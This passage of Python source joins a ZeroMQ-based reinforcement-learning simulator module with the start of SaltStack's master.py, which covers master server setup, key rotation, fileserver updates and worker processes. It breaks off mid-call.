state = player.current_state() reward, isOver = 0, False ts = 0 while True: c2s_socket.send(dumps( (self.identity, state, reward, isOver, ts, True)), copy=False) #t.grel here we get the action (action, ts, isAlive) = loads(s2c_socket.recv(copy=False).bytes) if not isAlive: c2s_socket.send(dumps( (self.identity, 0, 0, 0, 0, False)), copy=False) print("closing thread : {}".format(self.identity)) break reward, isOver = player.action(action) state = player.current_state() # compatibility SimulatorProcess = SimulatorProcessStateExchange class SimulatorMaster(threading.Thread): """ A base thread to communicate with all StateExchangeSimulatorProcess. It should produce action for each simulator, as well as defining callbacks when a transition or an episode is finished. 
""" __metaclass__ = ABCMeta class ClientState(object): def __init__(self): self.memory = [] # list of Experience def __init__(self, pipe_c2s, pipe_s2c, simulator_procs, pid): super(SimulatorMaster, self).__init__() self.daemon = True self.context = zmq.Context() self.c2s_socket = self.context.socket(zmq.PULL) self.c2s_socket.bind(pipe_c2s) self.c2s_socket.set_hwm(10) self.s2c_socket = self.context.socket(zmq.ROUTER) self.s2c_socket.bind(pipe_s2c) self.s2c_socket.set_hwm(10) # queueing messages to client self.send_queue = queue.Queue(maxsize=1) self.simulator_procs = simulator_procs self.killed_threads = 0 self.pid = pid def f(): msg = self.send_queue.get() self.s2c_socket.send_multipart(msg, copy=False) self.send_thread = LoopThread(f) self.send_thread.daemon = True self.send_thread.start() # make sure socket get closed at the end def clean_context(soks, context): for s in soks: s.close() context.term() import atexit atexit.register(clean_context, [self.c2s_socket, self.s2c_socket], self.context) def run(self): self.clients = defaultdict(self.ClientState) while True: bytes = self.c2s_socket.recv(copy=False).bytes msg = loads(bytes) ident, state, reward, isOver, ts, isAlive = msg client = self.clients[ident] if not isAlive: self.killed_threads += 1 print("killed : {}, waiting for {}".format(self.killed_threads, self.simulator_procs)) if self.killed_threads == self.simulator_procs: self.M.isDone = True break continue # check if reward&isOver is valid # in the first message, only state is valid if len(client.memory) > 0: client.memory[-1].reward = reward if isOver: self._on_episode_over((ident, ts)) else: self._on_datapoint((ident, ts)) # feed state and return action self._on_state(state, (ident, ts)) print("MasterSimulator is out, peace") time.sleep(10) os.kill(self.pid, signal.SIGKILL) @abstractmethod def _on_state(self, state, ident): """response to state sent by ident. Preferrably an async call""" @abstractmethod def _on_episode_over(self, client): """ callback when the client just finished an episode. You may want to clear the client's memory in this callback. """ def _on_datapoint(self, client): """ callback when the client just finished a transition """ def __del__(self): self.context.destroy(linger=0) class SimulatorProcessDF(SimulatorProcessBase): """ A simulator which contains a forward model itself, allowing it to produce data points directly """ def __init__(self, idx, pipe_c2s): super(SimulatorProcessDF, self).__init__(idx) self.pipe_c2s = pipe_c2s def run(self): self.player = self._build_player() self.ctx = zmq.Context() self.c2s_socket = self.ctx.socket(zmq.PUSH) self.c2s_socket.setsockopt(zmq.IDENTITY, self.identity) self.c2s_socket.set_hwm(5) self.c2s_socket.connect(self.pipe_c2s) self._prepare() for dp in self.get_data(): self.c2s_socket.send(dumps(dp), copy=False) @abstractmethod def _prepare(self): pass @abstractmethod def get_data(self): pass class SimulatorProcessSharedWeight(SimulatorProcessDF): """ A simulator process with an extra thread waiting for event, and take shared weight from shm. Start me under some CUDA_VISIBLE_DEVICES set! 
""" def __init__(self, idx, pipe_c2s, condvar, shared_dic, pred_config): super(SimulatorProcessSharedWeight, self).__init__(idx, pipe_c2s) self.condvar = condvar self.shared_dic = shared_dic self.pred_config = pred_config def _prepare(self): disable_layer_logging() self.predictor = OfflinePredictor(self.pred_config) with self.predictor.graph.as_default(): vars_to_update = self._params_to_update() self.sess_updater = SessionUpdate( self.predictor.session, vars_to_update) # TODO setup callback for explore? self.predictor.graph.finalize() self.weight_lock = threading.Lock() # start a thread to wait for notification def func(): self.condvar.acquire() while True: self.condvar.wait() self._trigger_evt() self.evt_th = threading.Thread(target=func) self.evt_th.daemon = True self.evt_th.start() def _trigger_evt(self): with self.weight_lock: self.sess_updater.update(self.shared_dic['params']) logger.info("Updated.") def _params_to_update(self): # can be overwritten to update more params return tf.trainable_variables() class WeightSync(Callback): """ Sync weight from main process to shared_dic and notify""" def __init__(self, condvar, shared_dic): self.condvar = condvar self.shared_dic = shared_dic def _setup_graph(self): self.vars = self._params_to_update() def _params_to_update(self): # can be overwritten to update more params return tf.trainable_variables() def _before_train(self): self._sync() def _trigger_epoch(self): self._sync() def _sync(self): logger.info("Updating weights ...") dic = {v.name: v.eval() for v in self.vars} self.shared_dic['params'] = dic self.condvar.acquire() self.condvar.notify_all() self.condvar.release() if __name__ == '__main__': import random from tensorpack.RL import NaiveRLEnvironment class NaiveSimulator(SimulatorProcess): def _build_player(self): return NaiveRLEnvironment() class NaiveActioner(SimulatorActioner): def _get_action(self, state): time.sleep(1) return random.randint(1, 12) def _on_episode_over(self, client): #print("Over: ", client.memory) client.memory = [] client.state = 0 name = 'ipc://whatever' procs = [NaiveSimulator(k, name) for k in range(10)] [k.start() for k in procs] th = NaiveActioner(name) ensure_proc_terminate(procs) th.start() import time time.sleep(100)
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs from __future__ import absolute_import, with_statement, print_function, unicode_literals import copy import ctypes import os import re import sys import time import errno import signal import stat import logging import collections import multiprocessing import threading import salt.serializers.msgpack # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO # pylint: enable=import-error,no-name-in-module,redefined-builtin import tornado.gen # pylint: disable=F0401 # Import salt libs import salt.crypt import salt.client import salt.client.ssh.client import salt.exceptions import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.key import salt.acl import salt.engines import salt.daemons.masterapi import salt.defaults.exitcodes import salt.transport.server import salt.log.setup import salt.utils.args import salt.utils.atomicfile import salt.utils.crypt import salt.utils.event import salt.utils.files import salt.utils.gitfs import salt.utils.gzip_util import salt.utils.jid import salt.utils.job import salt.utils.master import salt.utils.minions import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.stringutils import salt.utils.user import salt.utils.verify import salt.utils.zeromq from salt.config import DEFAULT_INTERVAL from salt.defaults import DEFAULT_TARGET_DELIM from salt.transport import iter_transport_opts from salt.utils.debug import ( enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack ) from salt.utils.event import tagify from salt.utils.odict import OrderedDict try: import resource HAS_RESOURCE = True except ImportError: # resource is not available on windows HAS_RESOURCE = False # Import halite libs try: import halite # pylint: disable=import-error HAS_HALITE = True except ImportError: HAS_HALITE = False log = logging.getLogger(__name__) class SMaster(object): ''' Create a simple salt-master, this will generate the top-level master ''' secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION} def __init__(self, opts): ''' Create a salt master server instance :param dict opts: The salt options dictionary ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): self.opts = state['opts'] self.master_key = state['master_key'] self.key = state['key'] SMaster.secrets = state['secrets'] def __getstate__(self): return {'opts': self.opts, 'master_key': self.master_key, 'key': self.key, 'secrets': SMaster.secrets} def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. 
''' return salt.daemons.masterapi.access_keys(self.opts) class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' A generalized maintenance process which performs maintenance routines. ''' def __init__(self, opts, **kwargs): ''' Create a maintenance instance :param dict opts: The salt options ''' super(Maintenance, self).__init__(**kwargs) self.opts = opts # How often do we perform the maintenance tasks self.loop_interval = int(self.opts['loop_interval']) # Track key rotation intervals self.rotate = int(time.time()) # A serializer for general maint operations self.serial = salt.payload.Serial(self.opts) # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) def __getstate__(self): return { 'opts': self.opts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _post_fork_init(self): ''' Some things need to be init'd after the fork has completed The easiest example is that one of these module types creates a thread in the parent process, then once the fork happens you'll start getting errors like "WARNING: Mixing fork() and threads detected; memory leaked." ''' # Load Runners ropts = dict(self.opts) ropts['quiet'] = True runner_client = salt.runner.RunnerClient(ropts) # Load Returners self.returners = salt.loader.returners(self.opts, {}) # Init Scheduler self.schedule = salt.utils.schedule.Schedule(self.opts, runner_client.functions_dict(), returners=self.returners) self.ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Init any values needed by the git ext pillar self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts) self.presence_events = False if self.opts.get('presence_events', False): tcp_only = True for transport, _ in iter_transport_opts(self.opts): if transport != 'tcp': tcp_only = False if not tcp_only: # For a TCP only transport, the presence events will be # handled in the transport code. self.presence_events = True def run(self): ''' This is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. 
''' salt.utils.process.appendproctitle(self.__class__.__name__) # init things that need to be done after the process is forked self._post_fork_init() # Make Start Times last = int(time.time()) old_present = set() while True: now = int(time.time()) if (now - last) >= self.loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) salt.daemons.masterapi.clean_expired_tokens(self.opts) salt.daemons.masterapi.clean_pub_auth(self.opts) self.handle_git_pillar() self.handle_schedule() self.handle_key_cache() self.handle_presence(old_present) self.handle_key_rotate(now) salt.utils.verify.check_max_open_files(self.opts) last = now time.sleep(self.loop_interval) def handle_key_cache(self): ''' Evaluate accepted keys and create a msgpack file which contains a list ''' if self.opts['key_cache'] == 'sched': keys = [] #TODO DRY from CKMinions if self.opts['transport'] in ('zeromq', 'tcp'): acc = 'minions' else: acc = 'accepted' for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)): if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)): keys.append(fn_) log.debug('Writing master key cache') # Write a temporary file securely if six.PY2: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file: self.serial.dump(keys, cache_file) else: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache'), mode='wb') as cache_file: self.serial.dump(keys, cache_file) def handle_key_rotate(self, now): ''' Rotate the AES key rotation ''' to_rotate = False dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) # Basic Windows permissions don't distinguish between # user/group/all. Check for read-only state instead. if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): to_rotate = True # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) elif stats.st_mode == 0o100400: to_rotate = True else: log.error('Found dropfile with incorrect permissions, ignoring...') os.remove(dfn) except os.error: pass if self.opts.get('publish_session'): if now - self.rotate >= self.opts['publish_session']: to_rotate = True if to_rotate: log.info('Rotating master AES key') for secret_key, secret_map in six.iteritems(SMaster.secrets): # should be unnecessary-- since no one else should be modifying with secret_map['secret'].get_lock(): secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']()) self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key') self.rotate = now if self.opts.get('ping_on_rotate'): # Ping all minions to get them to pick up the new key log.debug('Pinging all connected minions ' 'due to key rotation') salt.utils.master.ping_all_connected_minions(self.opts) def handle_git_pillar(self): ''' Update git pillar ''' try: for pillar in self.git_pillar: pillar.fetch_remotes() except Exception as exc: log.error('Exception caught while updating git_pillar', exc_info=True) def handle_schedule(self): ''' Evaluate the scheduler ''' try: self.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if self.schedule.loop_interval < self.loop_interval: self.loop_interval = self.schedule.loop_interval except Exception as exc: log.error('Exception %s occurred in scheduled job', exc) def handle_presence(self, old_present): ''' Fire presence events if enabled ''' # On the first run it may need more time for the EventPublisher # to come up and be ready. 
Set the timeout to account for this. if self.presence_events and self.event.connect_pull(timeout=3): present = self.ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} self.event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} self.event.fire_event(data, tagify('present', 'presence')) old_present.clear() old_present.update(present) class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' A process from which to update any dynamic fileserver backends ''' def __init__(self, opts, **kwargs): super(FileserverUpdate, self).__init__(**kwargs) self.opts = opts self.update_threads = {} # Avoid circular import import salt.fileserver self.fileserver = salt.fileserver.Fileserver(self.opts) self.fill_buckets() # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], log_queue=state['log_queue'], _opts=state['opts'] ) def __getstate__(self): return {'opts': self.opts, 'log_queue': self.log_queue,} def fill_buckets(self): ''' Get the configured backends and the intervals for any backend which supports them, and set up the update "buckets". There will be one bucket for each thing being updated at a given interval. ''' update_intervals = self.fileserver.update_intervals() self.buckets = {} for backend in self.fileserver.backends(): fstr = '{0}.update'.format(backend) try: update_func = self.fileserver.servers[fstr] except KeyError: log.debug( 'No update function for the %s filserver backend', backend ) continue if backend in update_intervals: # Variable intervals are supported for this backend for id_, interval in six.iteritems(update_intervals[backend]): if not interval: # Don't allow an interval of 0 interval = DEFAULT_INTERVAL log.debug( 'An update_interval of 0 is not supported, ' 'falling back to %s', interval ) i_ptr = self.buckets.setdefault(interval, OrderedDict()) # Backend doesn't technically need to be present in the # key, all we *really* need is the function reference, but # having it there makes it easier to provide meaningful # debug logging in the update threads. i_ptr.setdefault((backend, update_func), []).append(id_) else: # Variable intervals are not supported for this backend, so # fall back to the global interval for that fileserver. Since # this backend doesn't support variable updates, we have # nothing to pass to the backend's update func, so we'll just # set the value to None. try: interval_key = '{0}_update_interval'.format(backend) interval = self.opts[interval_key] except KeyError: interval = DEFAULT_INTERVAL log.warning( '%s key missing from configuration. 
Falling back to ' 'default interval of %d seconds', interval_key, interval ) self.buckets.setdefault( interval, OrderedDict())[(backend, update_func)] = None def update_fileserver(self, interval, backends): ''' Threading target which handles all updates for a given wait interval ''' def _do_update(): log.debug( 'Performing fileserver updates for items with an update ' 'interval of %d', interval ) for backend, update_args in six.iteritems(backends): backend_name, update_func = backend try: if update_args: log.debug( 'Updating %s fileserver cache for the following ' 'targets: %s', backend_name, update_args ) args = (update_args,) else: log.debug('Updating %s fileserver cache', backend_name) args = () update_func(*args) except Exception as exc: log.exception( 'Uncaught exception while updating %s fileserver ' 'cache', backend_name ) log.debug( 'Completed fileserver updates for items with an update ' 'interval of %d, waiting %d seconds', interval, interval ) condition = threading.Condition() _do_update() while True: with condition: condition.wait(interval) _do_update() def run(self): ''' Start the update threads ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) for interval in self.buckets: self.update_threads[interval] = threading.Thread( target=self.update_fileserver, args=(interval, self.buckets[interval]), ) self.update_threads[interval].start() # Keep the process alive while True: time.sleep(60) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance :param dict: The salt options ''' if zmq and ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) SMaster.__init__(self, opts) def __set_max_open_files(self): if not HAS_RESOURCE: return # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... macOS reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: %s/%s', mof_s, mof_h ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, %s, is higher ' 'than the highest value the user running salt is allowed to ' 'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h ) mof_c = mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to %s', mof_c) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: %s/%s', mof_s, mof_h ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under macOS reported that our 100000 default value is # still too high. log.critical( 'Failed to raise max open files setting to %s. If this ' 'value is too low, the salt-master will most likely fail ' 'to run properly.', mof_c ) def _pre_flight(self): ''' Run pre flight checks. 
If anything in this method fails then the master should not start up. ''' errors = [] critical_errors = [] try: os.chdir('/') except OSError as err: errors.append( 'Cannot change to root directory ({0})'.format(err) ) if self.opts.get('fileserver_verify_config', True): # Avoid circular import import salt.fileserver fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) else: # Run init() for all backends which support the function, to # double-check configuration try: fileserver.init() except salt.exceptions.FileserverConfigError as exc: critical_errors.append('{0}'.format(exc)) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') # Check to see if we need to create a pillar cache dir if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')): try: with salt.utils.files.set_umask(0o077): os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache')) except OSError: pass if self.opts.get('git_pillar_verify_config', True): try: git_pillars = [ x for x in self.opts.get('ext_pillar', []) if 'git' in x and not isinstance(x['git'], six.string_types) ] except TypeError: git_pillars = [] critical_errors.append( 'Invalid ext_pillar configuration. It is likely that the ' 'external pillar type was not specified for one or more ' 'external pillars.' ) if git_pillars: try: new_opts = copy.deepcopy(self.opts) import salt.pillar.git_pillar for repo in git_pillars: new_opts['ext_pillar'] = [repo] try: git_pillar = salt.utils.gitfs.GitPillar( new_opts, repo['git'], per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES, per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY, global_only=salt.pillar.git_pillar.GLOBAL_ONLY) except salt.exceptions.FileserverConfigError as exc: critical_errors.append(exc.strerror) finally: del new_opts if errors or critical_errors: for error in errors: log.error(error) for error in critical_errors: log.critical(error) log.critical('Master failed pre flight checks, exiting\n') sys.exit(salt.defaults.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user()) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): # Setup the secrets here because the PubServerChannel may need # them as well. SMaster.secrets['aes'] = { 'secret': multiprocessing.Array( ctypes.c_char, salt.utils.stringutils.to_bytes( salt.crypt.Crypticle.generate_key_string() ) ), 'reload': salt.crypt.Crypticle.generate_key_string } log.info('Creating master process manager') # Since there are children having their own ProcessManager we should wait for kill more time. 
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5) pub_channels = [] log.info('Creating master publisher process') log_queue = salt.log.setup.get_multiprocessing_logging_queue() kwargs = {'_opts': self.opts} if salt.utils.platform.is_windows(): kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue() kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level() for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.pre_fork(self.process_manager, kwargs=kwargs) pub_channels.append(chan) log.info('Creating master event publisher process') self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,), kwargs=kwargs) if self.opts.get('reactor'): if isinstance(self.opts['engines'], list): rine = False for item in self.opts['engines']: if 'reactor' in item: rine = True break if not rine: self.opts['engines'].append({'reactor': {}}) else: if 'reactor' not in self.opts['engines']: log.info('Enabling the reactor engine') self.opts['engines']['reactor'] = {} salt.engines.start_engines(self.opts, self.process_manager) # must be after channels log.info('Creating master maintenance process') self.process_manager.add_process(Maintenance, args=(self.opts,), kwargs=kwargs) if self.opts.get('event_return'): log.info('Creating master event return process') self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,), kwargs=kwargs) ext_procs = self.opts.get('ext_processes', []) for proc in ext_procs: log.info('Creating ext_processes process: %s', proc) try: mod = '.'.join(proc.split('.')[:-1]) cls = proc.split('.')[-1] _tmp = __import__(mod, globals(), locals(), [cls], -1) cls = _tmp.__getattribute__(cls) self.process_manager.add_process(cls, args=(self.opts,), kwargs=kwargs) except Exception: log.error('Error creating ext_processes process: %s', proc) if HAS_HALITE and 'halite' in self.opts: log.info('Creating master halite process') self.process_manager.add_process(Halite, args=(self.opts['halite'],), kwargs=kwargs) # TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there) if self.opts['con_cache']: log.info('Creating master concache process') self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,), kwargs=kwargs) # workaround for issue #16315, race condition log.debug('Sleeping for two seconds to let concache rest') time.sleep(2) log.info('Creating master request server process') self.process_manager.add_process( ReqServer, args=(self.opts, self.key, self.master_key, SMaster.secrets), kwargs=kwargs, name='ReqServer') self.process_manager.add_process( FileserverUpdate, args=(self.opts,), kwargs=kwargs) # Fire up SSDP discovery publisher if self.opts['discovery']: if salt.utils.ssdp.SSDPDiscoveryServer.is_available(): self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer( port=self.opts['discovery']['port'], listen_ip=self.opts['interface'], answer={'mapping': self.opts['discovery'].get('mapping', {})}).run, kwargs=kwargs) else: log.error('Unable to load SSDP: asynchronous IO is not available.') if sys.version_info.major == 2: log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.') # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if 
signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) self.process_manager.run() def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' Manage the Halite server ''' def __init__(self, hopts, **kwargs): ''' Create a halite instance :param dict hopts: The halite options ''' super(Halite, self).__init__(**kwargs) self.hopts = hopts # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['hopts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['hopts'] ) def __getstate__(self): return { 'hopts': self.hopts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def run(self): ''' Fire up halite! ''' salt.utils.process.appendproctitle(self.__class__.__name__) halite.start(self.hopts) class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, key, mkey, secrets=None, **kwargs): ''' Create a request server :param dict opts: The salt options dictionary :key dict: The user starting the server and the AES key :mkey dict: The user starting the server and the RSA key :rtype: ReqServer :returns: Request server ''' super(ReqServer, self).__init__(**kwargs) self.opts = opts self.master_key = mkey # Prepare the AES key self.key = key self.secrets = secrets # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], state['key'], state['mkey'], secrets=state['secrets'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) def __getstate__(self): return { 'opts': self.opts, 'key': self.key, 'mkey': self.master_key, 'secrets': self.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self.destroy(signum) super(ReqServer, self)._handle_signals(signum, sigframe) def __bind(self): ''' Binds the reply server ''' if self.log_queue is not None: salt.log.setup.set_multiprocessing_logging_queue(self.log_queue) if self.log_queue_level is not None: salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level) salt.log.setup.setup_multiprocessing_logging(self.log_queue) if self.secrets is not None: SMaster.secrets = self.secrets dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) os.remove(dfn) except os.error: pass # Wait for kill should be less then parent's ProcessManager. 
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager', wait_for_kill=1) req_channels = [] tcp_only = True for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.ReqServerChannel.factory(opts) chan.pre_fork(self.process_manager) req_channels.append(chan) if transport != 'tcp': tcp_only = False kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = self.log_queue kwargs['log_queue_level'] = self.log_queue_level # Use one worker thread if only the TCP transport is set up on # Windows and we are using Python 2. There is load balancer # support on Windows for the TCP transport when using Python 3. if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1: log.warning('TCP transport supports only 1 worker on Windows ' 'when using Python 2.') self.opts['worker_threads'] = 1 # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): for ind in range(int(self.opts['worker_threads'])): name = 'MWorker-{0}'.format(ind) self.process_manager.add_process(MWorker, args=(self.opts, self.master_key, self.key, req_channels, name), kwargs=kwargs, name=name) self.process_manager.run() def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self, signum=signal.SIGTERM): if hasattr(self, 'process_manager'): self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) self.process_manager.kill_children() # pylint: disable=W1701 def __del__(self): self.destroy() # pylint: enable=W1701 class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' The worker multiprocess instance to manage the backend operations for the salt master. ''' def __init__(self, opts, mkey, key, req_channels, name, **kwargs): ''' Create a salt master worker process :param dict opts: The salt options :param dict mkey: The user running the salt master and the AES key :param dict key: The user running the salt master and the RSA key :rtype: MWorker :return: Master worker ''' kwargs['name'] = name self.name = name super(MWorker, self).__init__(**kwargs) self.opts = opts self.req_channels = req_channels self.mkey = mkey self.key = key self.k_mtime = 0 self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = time.time() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. 
def __setstate__(self, state): self._is_child = True super(MWorker, self).__init__( log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) self.opts = state['opts'] self.req_channels = state['req_channels'] self.mkey = state['mkey'] self.key = state['key'] self.k_mtime = state['k_mtime'] SMaster.secrets = state['secrets'] def __getstate__(self): return { 'opts': self.opts, 'req_channels': self.req_channels, 'mkey': self.mkey, 'key': self.key, 'k_mtime': self.k_mtime, 'secrets': SMaster.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): for channel in getattr(self, 'req_channels', ()): channel.close() super(MWorker, self)._handle_signals(signum, sigframe) def __bind(self): ''' Bind to the local port ''' # using ZMQIOLoop since we *might* need zmq in there install_zmq() self.io_loop = ZMQDefaultLoop() self.io_loop.make_current() for req_channel in self.req_channels: req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily? try: self.io_loop.start() except (KeyboardInterrupt, SystemExit): # Tornado knows what to do pass @tornado.gen.coroutine def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server Example cleartext payload generated for 'salt myminion test.ping': {'enc': 'clear', 'load': {'arg': [], 'cmd': 'publish', 'fun': 'test.ping', 'jid': '', 'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj', 'kwargs': {'show_jid': False, 'show_timeout': False}, 'ret': '', 'tgt': 'myminion', 'tgt_type': 'glob', 'user': 'root'}} :param dict payload: The payload route to the appropriate handler ''' key = payload['enc'] load = payload['load'] ret = {'aes': self._handle_aes, 'clear': self._handle_clear}[key](load) raise tornado.gen.Return(ret) def _post_stats(self, start, cmd): ''' Calculate the master stats and fire events with stat info ''' end = time.time() duration = end - start self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs'] if end - self.stat_clock > self.opts['master_stats_event_iter']: # Fire the event with the stats and wipe the tracker self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 